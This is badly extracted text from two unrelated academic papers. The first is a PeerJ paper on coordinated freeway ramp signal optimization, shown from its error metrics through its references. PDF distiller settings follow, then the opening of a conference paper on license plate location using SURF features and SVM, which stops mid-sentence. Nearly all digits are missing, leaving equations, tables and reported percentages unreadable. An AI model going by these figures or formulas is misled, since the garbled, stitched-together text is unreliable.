calculated as follows: rmse ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi m xm i¼ ðyi � ŷiÞ s ( ) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. mean absolute percentage error of % indicates a perfect model, while a mape greater than % indicates a flawed model. mape can be calculate as follows: mape ¼ % m xm i¼ ŷi � yi yi ���� ���� ( ) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. the table shows the prediction results of various methods. it can be seen that in the rmse, both lstm and gru are much better than saes. there is little difference between lstm and gru. in the mape column, gru performs the optimal prediction effect. figure shows how the predicted value compares with the observed value and other methods. it can be seen from the figure that all curves fit the observed data. during the low-flow phase, the saes were predicted to be substantially higher than the true values. and the lstm and gru are much closer to the true values. sumo platform simulation of urban mobility (lopez et al., ; krajzewicz et al., ) used in this article is a free and open-source traffic system simulation software compared with the above microsimulation platforms. it can realize microscopic control of traffic flow. each vehicle’s route on the specific road can be planned individually. furthermore, it has a mature code control module, which makes data analysis more convenient. the entire sumo-based simulation framework shows in fig. . we model multi-ramp section in sumo, and entering the traffic flow data during the morning peak period. we use the idm model as car following model. the idm model (treiber, hennecke & helbing, ) is by far the most complete and simple accident-free theoretical heeling model, which belongs to the class of expectation measures. the idm model is described in eqs. ( ) and ( ). table the performance comparisons. method rmse mape (%) saes . . lstm . . gru . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ v a ¼ a � va v � �d � s � va; dvað Þ sa � � " # ( ) s� v; dvð Þ ¼ s þ s ffiffiffiffi v v r þ tav þ vdv ffiffiffiffiffi ab p ( ) the vehicle acceleration v a can be obtained by minimum vehicle distance s � v; dvð Þ, velocity, vehicle clearance from the vehicle in front sa and expected velocity v . in eq. ( ), t represents safety time step, ab represent the max acceleration and the expected deceleration ability of vehicles. dv is speed difference with the car in front, s and s are distance with congested traffic. for model parameter calibrations, see table below. besides, the channel change model is also very critical. the vehicle lane change model we have chosen is lc (erdmann, ). in conjunction with the application in the related literature (papamichail et al., a), the common evaluation metrics are average travel time (att), which indicates the travel time of mainline vehicles; average waiting time (awt), which indicates the waiting figure sumo simulation framework. full-size doi: . /peerj-cs. /fig- figure result of traffic flow prediction. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ time of ramp vehicles. besides, the density and speed of the bottleneck locations are selected as evaluation metrics, which can reflect the ability to alleviate congestion at the bottleneck locations. results this article uses sumo simulation software to perform experiments on four on-ramp scenarios. the correlation between individual ramps and bottlenecks can be obtained by the method above, leading to the weight matrix. we have used various methods for simulation. no signal method: ramp signal is all green. in this case, the on-ramp traffic can enter the freeway without obstruction. this is used as a control experiment to demonstrate the effect of signal optimization. distance-based method: only the spatial distance between the ramp and the bottleneck is used as a weighting factor for traffic assignment. such an approach would overweight the ramp closest to the bottleneck and assign less weight to the other ramps upstream. such an approach has an absolute static nature. distance-flow-based method: use spatial distance and the on-ramp flow as the assigned weight factors. such an approach considers the contribution of the on-ramp flow to the bottleneck congestion compared to considering only the spatial distance. however, the on-ramp flow may flow at other off-ramps and is not necessarily the root cause of congestion. traffic states-based method: use spatial distance, ramp flow, and dynamic traffic flow correlation as the assigned weighting factors. such a method adds the traffic flow correlation between ramps and bottlenecks to the above method. it better traces the source of congestion and is dynamic and predictable. table shows the results of the weights matrix generated from different factors. our correlation measurement of traffic flow-series reveals that the closest on-ramp upstream may not significantly impact the bottleneck. a particular ramp further upstream may have a greater impact on the bottleneck because of the faster flow growth trend. before implementing the signal optimization algorithm, each bottleneck road section's critical density needs to be obtained. as the traffic flow is sensitive to the critical density table model parameters of idm. attribute value description v . m/s expected velocity of vehicles a . m/s the max acceleration ability of vehicles b . m/s the expected deceleration ability of vehicles s , s . m distance with congested traffic t s safety time step d acceleration index l m vehicle length liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ changes, the traffic state can be divided near the critical point. the four bottleneck sections’ critical densities are , , and veh/km, as shown in fig. . we test the performance of the algorithm under normal and heavy demands. there are five lanes and two lanes in the mainline and ramp, separately. so, we use , pcu/h as mainline saturated flow rate and , pcu/h as ramp saturated flow rate (niittymäki & pursula, ). according to the fig. a, we can observe that between : and : , the road section’s average traffic flow is about , pcu/h, which is about . % of the saturated flow rate. moreover, the maximum value is approximately , pcu/h, about . % of the saturation flow rate. in the simulation process, we found that using real mainline demand can cause a congestion situation. instead of increasing the mainline table weight matrix based on different factors. bottleneck bottleneck bottleneck bottleneck distance based ramp . . . . ramp . . . . ramp . . . . ramp . . . . distance and flow based ramp . . . . ramp . . . . ramp . . . . ramp . . . . traffic states based ramp . . . . ramp . . . . ramp . . . . ramp . . . . figure flow-density scatter plot of bottleneck section. (a) flow and density of bottleneck . (b) flow and density of bottleneck . (c) flow and density of bottleneck . (d) flow and density of bottleneck . full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ traffic, we set up a scenario of increasing ramp traffic to simulate heavy ramp traffic and evaluate the signal optimization scheme. as shown in the fig. b, the average traffic flow on the ramp between : and : is about pcu/h. this value is far below the saturated flow rate of , pcu/h. therefore, we added a heavy demand to simulate the busy condition of the ramp. the traffic flow under heavy demand is about – pcu/h, accounting for about . – . % of the saturation flow rate. the normal demand represents releasing vehicles at . % of the mainline saturated traffic demand, . % of the ramp saturated traffic demand. the heavy demand releases vehicles at . % of the mainline saturated traffic demand, . % of the ramp saturated traffic demand. table below shows the performances of each algorithm. it shows that the mainline att improvement using the ramp signal optimization method is limited in normal demand. in contrast, it has a larger improvement in the ramp awt. because when traffic demand is low on the mainline, the on-ramp merges into the mainline, and the ramp signal reduces movement efficiency. in terms of movement through the bottleneck, the traffic-state-based method reduces bottlenecks’ density to a greater extent ( . %) than the other approaches ( . % and . %). compared to other methods, our method has a smaller gap in speed through the bottleneck, but the improvement is relatively significant ( . %). the heavy demand scenario simulates over-congestion during peak periods. the signal optimization is more pronounced than the no signal scenario, with . %, . % and . % improvements in mainline att, respectively. however, a smaller increase in ramp awt compared to normal demand. the approach that considers traffic states effectively reduces the bottleneck’s density under heavy demand, reducing it by an average of . veh/km ( %) and increasing . % of the average speed of vehicles passing through the bottleneck. figure shows the average density of the four bottlenecks under normal demand using different signal optimization algorithms. it demonstrates persistent congestion in the seventh road section, for which no control is often not possible. in contrast, the use of signal optimization can significantly reduce congestion. the distance-flow-based method and traffic-state-based method have a better performance on the congestion reduction. the traffic-state-based method keeps density to a much lower range in – min. table performance under different demand. demand method mainline travel time (s) ramp waiting time (s) bottleneck density (veh/km) bottleneck velocity (km/h) normal demand no signal . . . . distance based . (− . %) . (+ . %) . (− . %) . (+ . %) distance and flow based . (− . %) . (+ . %) . (− . %) . (+ . %) traffic states based . (− . %) . (+ . %) . (− . %) . (+ . %) heavy demand no signal . . . . distance based . (− . %) . (+ . %) . (− . %) . (+ . %) distance and flow based . (− . %) . (+ . %) . (− . %) . (+ . %) traffic states based . (− . %) . (+ . %) . (− . %) . (+ . %) liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure density heatmap on normal demand. (a) no signal. (b) distance-based method. (c) distance-flow-based method. (d) traffic-state- based method. full-size doi: . /peerj-cs. /fig- figure density heatmap on heavy demand. (a) no signal. (b) distance-based method. (c) distance-flow-based method. (d) traffic-state- based method. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the average density of the four bottlenecks under heavy demand using different algorithms. it shows that the third and fifth road sections also experience intermittent congestion in addition to the seventh road section. the traffic-state-based method effectively relieves congestion in the fifth and seventh road segments and maintains a lower density at – and – min comparing to the others. figure shows the variation in mainline awt under different demand conditions. it illustrates that the signal optimization method keeps the mainline att relatively low regardless of the demand level. the traffic-state-based method exhibits lower att at more moments, which means smoother vehicle movement. conclusions to address expressway congestion, we propose a coordinated signal optimization framework based on dynamic traffic states. in this article, the gru neural network was used to predict the traffic flow. cross-correlation obtains the dynamic correlation between the bottleneck and ramp traffic flow. our framework considers both static road property and dynamic traffic state to achieve signal optimization compared with previous research. the performance of our algorithm was verified on the sumo simulation platform. the results show that our approach can reduce the mainline bottleneck density by . % and . % under normal and heavy demand, separately. we also found that it is a more reasonable option in the lower traffic demand scenario without using a signal. moreover, in congested scenarios, the use of signal optimization can reduce the density of the mainline. in future work, we will work on signal optimization solutions for the broad ramp area. using detailed traffic trajectory data to analyze congestion’s spatial and temporal characteristics, we will develop a coordinated signal optimization program. additional information and declarations funding this work is supported by the national natural science foundation of china ( and ), the zhejiang province basic public welfare research project (lgg f ), figure total travel time. (a) normal demand situation. (b) heavy demand situation. full-size doi: . /peerj-cs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the zhejiang provincial natural science foundation (lr f ), and fundamental research funds for the provincial universities of zhejiang (rf-b ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: and . zhejiang province basic public welfare research project: lgg f . zhejiang provincial natural science foundation: lr f . fundamental research funds for the provincial universities: rf-b . competing interests xiangjie kong is an academic editor for peerj. author contributions � zhi liu conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � wendi shu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � guojiang shen performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � xiangjie kong performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code are available at github: https://github.com/wendyshu /signalopt. references bakar za, mohemad r, ahmad a, deris mm. . a comparative study for outlier detection techniques in data mining. in: ieee conference on cybernetics and intelligent systems. piscataway: ieee, – . berkhin p. . a survey of clustering data mining techniques. in: kogan j, nicholas c, teboulle m, eds. grouping multidimensional data. heidelberg: springer, – . berndt dj, clifford j. . using dynamic time warping to find patterns in time series. in: kdd workshop. – . chang th, li zy. . optimization of mainline traffic via an adaptive co-ordinated ramp-metering control model with dynamic od estimation. transportation research part c: emerging technologies ( ): – doi . /s - x( ) - . chen j, lin l, jiang r. . assigning on-ramp flows to maximize capacity of highway with two on-ramps and one off-ramp in between. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/wendyshu /signalopt http://dx.doi.org/ . /s - x( ) - http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chen j, lin w, yang z, li j, cheng p. a. adaptive ramp metering control for urban freeway using large-scale data. ieee transactions on vehicular technology ( ): – doi . /tvt. . . chen y, liu f, bai q, tao c, qi x. b. coordinated ramp metering based on real-time od information. ieee access : – doi . /access. . . cho k, van merriënboer b, gulcehre c, bahdanau d, bougares f, schwenk h, bengio y. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). – . dabiri a, kulcsar b. . distributed ramp metering—a constrained discharge flow maximization approach. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . erdmann j. . sumo’s lane-changing model. in: behrisch m, weber m, eds. modeling mobility with open data—lecture notes in mobility. cham: springer, – . feng y, yu s, zhang k, li x, ning z. . comics: a community property-based triangle motif clustering scheme. peerj computer science ( ):e doi . /peerj-cs. . frejo jrd, camacho ef. . global versus local mpc algorithms in freeway traffic control with ramp metering and variable speed limits. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . fu r, zhang z, li l. . using lstm and gru neural network methods for traffic flow prediction. in: proceedings of youth academic annual conference of chinese association of automation. – . han x, shen g, yang x, kong x. . congestion recognition for hybrid urban road systems via digraph convolutional network. transportation research part c: emerging technologies ( ): doi . /j.trc. . . he l, agard b, trépanier m. . a classification of public transit users with smart card data based on time series distance metrics and a hierarchical clustering method. transportmetrica a: transport science ( ): – doi . / . . . hegyi a, de schutter b, hellendoorn j. . optimal coordination of variable speed limits to suppress shock waves. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . kong x, tong s, gao h, shen g, wang k, collotta m, you i, das s. . mobile edge cooperation optimization for wearable internet of things: a network representation-based framework. ieee transactions on industrial informatics : doi . /tii. . . kong x, wang k, wang s, wang x, jiang x, guo y, shen g, chen x, ni q. . real-time mask identification for covid- : an edge computing-based deep learning framework. ieee internet of things journal : doi . /jiot. . . kontorinaki m, karafyllis i, papageorgiou m. . local and coordinated ramp metering within the unifying framework of an adaptive control scheme. transportation research part a: policy and practice ( ): – doi . /j.tra. . . . krajzewicz d, erdmann j, behrisch m, bieker l. . recent development and applications of sumo—simulation of urban mobility. international journal on advances in systems and measurements ( & ): – . kumar k, parida m, katiyar v. . short term traffic flow prediction for a non urban highway using artificial neural network. procedia—social and behavioral sciences ( ): – doi . /j.sbspro. . . . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /j.trc. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /j.tra. . . http://dx.doi.org/ . /j.sbspro. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li z, zhao y, liu r, pei d. . robust and rapid clustering of kpis for large-scale anomaly detection. in: ieee/acm international symposium on quality of service. piscataway: ieee, – . liao tw. . clustering of time series data—a survey. pattern recognition ( ): . lipp le, corcoran lj, hickman ga. . benefits of central computer control for denver ramp-metering system. transportation research record : – . liu q, wang b, zhu y. . short-term traffic speed forecasting based on attention convolutional neural network for arterials. computer-aided civil and infrastructure engineering ( ): – doi . /mice. . lopez pa, behrisch m, bieker-walz l, erdmann j, flötteröd yp, hilbrich r, wiebner e. . microscopic traffic simulation using sumo. in: ieee intelligent transportation systems conference. piscataway: ieee, – . lv y, duan y, kang w, li z, wang f-y. . traffic flow prediction with big data: a deep learning approach. ieee transactions on intelligent transportation systems ( ): – . meng q, khoo hl. . a pareto-optimization approach for a fair ramp metering. transportation research part c: emerging technologies ( ): – doi . /j.trc. . . . meshkat a, zhi m, vrancken jlm, verbraeck a, yuan yf, wang yb. . coordinated ramp metering with priorities. iet intelligent transport systems ( ): – doi . /iet-its. . . niittymäki j, pursula m. . saturation flows at signal-group-controlled traffic signals. transportation research record: journal of the transportation research board ( ): – doi . / - . paesani g, kerr j, perovich p, khosravi fe. . system wide adaptive ramp metering (swarm) merging the transportation and communications revolutions. washington, d.c.: abstracts for its america seventh annual meeting and exposition. papageorgiou m, kotsialos a. . freeway ramp metering: an overview. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . papamichail i, kotsialos a, margonis i, papageorgiou m. a. coordinated ramp metering for freeway networks—a model-predictive hierarchical control approach. transportation research part c: emerging technologies ( ): – doi . /j.trc. . . . papamichail i, papageorgiou m, vong v, gaffney j. b. heuristic ramp-metering coordination strategy implemented at monash freeway, australia. transportation research record: journal of the transportation research board ( ): – doi . / - . paparrizos j, gravano l. . k-shape: efficient and accurate clustering of time series. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . schmitt m, ramesh c, lygeros j. . sufficient optimality conditions for distributed, non-predictive ramp metering in the monotonic cell transmission model. transportation research part b: methodological ( ): – doi . /j.trb. . . . shen g, zhao z, kong x. . gcn cdd: a commercial district discovery framework via embedding space clustering on graph convolution networks. in: ieee transactions on industrial informatics. piscataway: ieee. su y, zhao y, xia w, liu r, bu j, zhu j, wang z. . coflux: robustly correlating kpis by fluctuations for service troubleshooting. in: proceedings of the international symposium on quality of service. – . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /mice. http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . /iet-its. . http://dx.doi.org/ . / - http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /j.trc. . . http://dx.doi.org/ . / - http://dx.doi.org/ . /j.trb. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ treiber m, hennecke a, helbing d. . congested traffic states in empirical observations and microscopic simulations. physical review e ( ): – doi . /physreve. . . uras n, marchesi l, marchesi m, tonelli r. . forecasting bitcoin closing price series using linear regression and neural networks models. peerj computer science ( ):e doi . /peerj-cs. . van de weg gs, hegyi a, hoogendoorn sp, de schutter b. . efficient freeway mpc by parameterization of alinea and a speed-limited area. ieee transactions on intelligent transportation systems ( ): – doi . /tits. . . williams b, hoel l. . modeling and forecasting vehicular traffic flow as a seasonal arima process: theoretical basis and empirical results. journal of transportation engineering ( ): – doi . /(asce) - x( ) : ( ). yu dj, liu cf, wu yy, liao s, anwar t, li wq, zhou cb. . forecasting short-term traffic speed based on multiple attributes of adjacent roads. knowledge-based systems ( ): – doi . /j.knosys. . . . zhang g, wang y. . optimizing coordinated ramp metering: a preemptive hierarchical control approach. computer-aided civil and infrastructure engineering ( ): – doi . /j. - . . .x. zhang h, wang x, cao j, tang m, guo y. . a hybrid short-term traffic flow forecasting model based on time series multifractal characteristics. applied intelligence ( ): – doi . /s - - - . zhang c, wang j, lai j, yang x, su y, dong z. . extracting origin-destination with vehicle trajectory data and applying to coordinated ramp metering. journal of advanced transportation ( ): – doi . / / . zheng h, lin f, feng x, chen y. . a hybrid deep learning model with attention-based conv-lstm networks for short-term traffic flow prediction. in: ieee transactions on intelligent transportation systems. piscataway: ieee, – . liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /(asce) - x( ) : ( ) http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. coordinated ramp signal optimization framework based on time series flux-correlation analysis introduction literature review framework design experiment results conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs /cht /dan /deu /esp /fra /ita /jpn /kor /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor /ptb /suo /sve /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice 哈尔滨工程大学学报模板 international conference on sensor network and computer engineering (icsnce ) multiple vehicle license plate location in complex background yaxin zhao school of computer science and engineering technological university xi’an, china e-mail: @qq.com li zhao school of computer science and engineering, xi’an technological university, xi’an, china e-mail: @qq.com ya li chongqing water resources and electric engineering college chong qing, china e-mail: @qq.com abstract—in order to expand the application range of the intelligent traffic management system, and to solve the problem that the license plate positioning accuracy is low in the changing of the scene. on the basis of the analysis of previous methods advantages and disadvantages, applying deep learning model orientation method is proposed. the image expressed as graph of graph theory .based on the principle of minimum spanning tree preliminary separate target objects in image of vehicle. combined with the color, dimension, texture and match the similarity to choose, search and merger area in the image, suspicious area of the license plate is obtained. using visual word package to express rectangular profile after coarse positioning. using support vector machine (svm) to classify and identify rectangular area of license plate. accurate positioning license plate location is positioned accurately. the method of accuracy is . % for pieces of test sample positioning, strong anti-jamming. keywords-license plate position; complex background; bag-of-view; support vector machine; license plate vertical texture at present , there is the main algorithm is based on the morphological features for the license plate location problem . the algorithm is mainly using the texture characteristics of car license plate . after processing on the morphology , it takes exclusion of a part of the interference of the noise in the background of license plate images , and then based on the geometric features of license plate, such as aspect ratio condition to locate the license plate location . due to the use of the algorithm is only a single plate texture feature, ignoring the license plate of the other characteristics of the information . so when the image background and license plate area is in the same objects with the texture feature , just rely on geometric features such as aspect ratio decision condition is difficult to determine whether to license plate area. eventually led to the wrong location; the positioning algorithm based on color image [ ].this algorithm makes full use of the license plate in the image color information, through the characteristics of the different color space to locate the license plate. but the color model is operate in the image on the multi-channel models . it has large amount of calculation and poor real-time performance. when the license plate region color is very similar to surroundings, the algorithm positioning error rate increase. and the color of the license plate image information is susceptible to interference illumination change, which made an impact on the extraction of license plate character. eventually lead to the wrong location or position; the algorithm based on bp neural network. the algorithm is divided the image grid precessed into many blocks ,using neural network for each block region extracted feature descriptor to classify and locate the license plate. but the extraction of license plate image characteristics of image block area size has nothing to do with the actual license plate image size. the global characteristics can not truly reflect the global features of the license plate. convergence time is long, and bp algorithm easy to fall into local optimum. i. visual word package model of license plate localization algorithm analysis of previous license plate localization algorithm based on texture feature. after the license plate image by the morphological processing can effectively make the license plate area rectangle connected area. but it is difficult to further improve the accuracy of this method. if the interference area of the image and texture features of license plate is similar, then interference region to form a rectangular connected domain also. so just rely on license plate aspect ratio to determine conditions to distinguish the license plate region and the license plate region is difficult. this makes the poor anti-jamming, misjudgment rate is high. aimed at the problem in rectangular area filter link using the visual word packet and support vector machine (svm) to improve filtering accuracy. basic principle of visual word package features is to use characteristic descriptors to express images, and international conference on sensor network and computer engineering (icsnce ) put the picture as a different set of feature points. through the statistics of each feature point frequency in the single photo to vectors to a photograph. namely in the form of a histogram to represent the photograph [ ].as shown in figure package basic process for visual words. due to the different types of pictures’ vector representation from it’s visual word package are different, so it can choose the appropriate classifier using sample set for training. then use the trained classifier to classify test images. figure . flow chart of bow model considering the license plate images will get affected by angle, light and other factors. in order to reduce such factors on the characteristics of the descriptor to describe the influence of the license plate area, and can achieve rapid positioning of the target. this paper adopted the surf feature descriptor. the descriptor is characterized by has fast calculation and partial invariance. that is to say, it has the scale of the robustness of a certain range scaling, image rotation, the change of perspective, illumination changes and image blur, can effectively eliminate from light, angle and other factors. extraction algorithm of surf feature descriptor is hessian matrix is used to determine the candidate points. not greatly restrain and realize the feature point detection. in the image pixel hessian matrix are defined as follows:             ,h yfyxf yxfxf yxf ( ) hessian matrix discriminant such as type ( ).the value of the discriminant is the eigenvalues of the hessian matrix. it classifies all points using symbols of determining structure and according to the discriminant value plus or minus identifying whether this point is the value of the pole.   hdet                 yx f y f x f ( ) this algorithm use image pixel l (x, y) to replace function f (x, y) and use type ( ) through specific nuclear convolution between to computation the second order partial derivative, it is concluded that the hessian matrix of the matrix elements is xx l 、 xy l 、 yy l .according to the type ( ) the discriminant, a approximate hessian determinant map can be obtained. compared with hessian matrix of each pixel point and the pyramid image the size of the points in the field of d. the maximum as the characteristics of the initial point. as shown in figure . local eigenvalues of x is greater than the surrounding pixels. it is the characteristic points of the region. figure . feature points in order to guarantee the rotation invariance, we need to calculate centered on feature points a-nd the sum of the corresponding harr wavelet for degrees within the sector is all points in the direction of the x and y. close to feature points of the weight is big , away from is small. to get the main direction of each feature point. this process is shown in figure . international conference on sensor network and computer engineering (icsnce ) figure . determine the main direction although can surf characteristics describe a image, an image contains a large number of surf feature points.if the training directly used in classification, calculation will be very big. we need through the clustering algorithm to cluster the vector data.using a cluster of clusters represent visual words in a visual word, and then map the surf feature points to the visual word package generated code.in this paper, using k means clustering algorithm in constructing the visual word package .the principle of algorithm is simple and easy to implement and there is a good clustering effect.such as type ( ) the calculation formula.e is sum of square error for all clustering objects.p is the clustering objects. i c is the number of i c class of clustering objects .     i cp c p pe i ( ) the problem of license plate location only need to classify an outline of the license plate and the plate profile picture. we chose svm ,which is the classifier of dichotomy.svm is a kind of machine learning methods based on the theory of vc dimension and the theory of structural risk minimization . it is outstanding in solving nonlinear problems and it was originally designed for binary classification problems [ ].principle of svm is put data map to high-dimensional space, then finding largest classification interval hyperplane in high dimensional space, and using the hyperplane to classify. such as type ( ) calculation formula.   ii yx , is the training sample. l for the sample. n for the dimensions of the input.c is punish parameters.  as though laser coefficient.   ji xxk , for the selection of kernel function.      n ji jijiii n i i xxkyy , , max s.t. c i  , i = ,...,n ( )   n i ii y ii. the realization of the algorithm a. the suspicious area extraction of license plate image contains abundant information.the object shape, size, color, texture, and other characteristics.the image is defined as the graph of graph theory, are defined as follows: evvevvv evg jiiji   ),(,, ),( ( ) among them, i v is a picture point in the image and a vertex of graph in the graph theory. i e is the weight of an edge of graph in the graph theory, is i v and j v between the picture points of the gray level difference or the distance between the.using graph cuts algorithm [] to divided graph g into a series of disjoint independent subgraphs ' g .the algorithm is mainly using the minimum spanning tree (mst, minimun spanning tree), realizing regional segmentation.for segmentation region contains the largest edge weights are defined as follows: )(max)( ),( ecint ecmste    ( ) among them, c is a segmented regions. ()w is weight. the minimum edge weights of vertices are connected between the two regional segmentation are defined as follows: )),((min),( ),(,, ji evvcvcv vvwccdif jiji   ( ) for no edge connection between segmentation part, is s.for the segmentation boundary judgment are defined as follows:      otherwisefalse ccmintccdififtrue ccd ),(),(, ),( ( ) the smallest division of internal difference are defined as follows: ))()(),()(min(),( ccintccintccmint   ( ) among them, () as the threshold function control segmentation area of consolidation degree, defined as   ckc / , c is segmentation part of the number of vertices, k is coarsness of parameter control image segmentation area .using graph cuts algorithm to international conference on sensor network and computer engineering (icsnce ) conduct a preliminary regional segmentation for image, the segmentation result is shown in figure . (a) (b) figure . image segmentation in the image object is hierarchical. after initial segmented regions, using similarity to calculate diversification and region merging. for area merger adopt four similarity in the image as follows: ) color similarity. the normalized image obtains bins in the histogram for 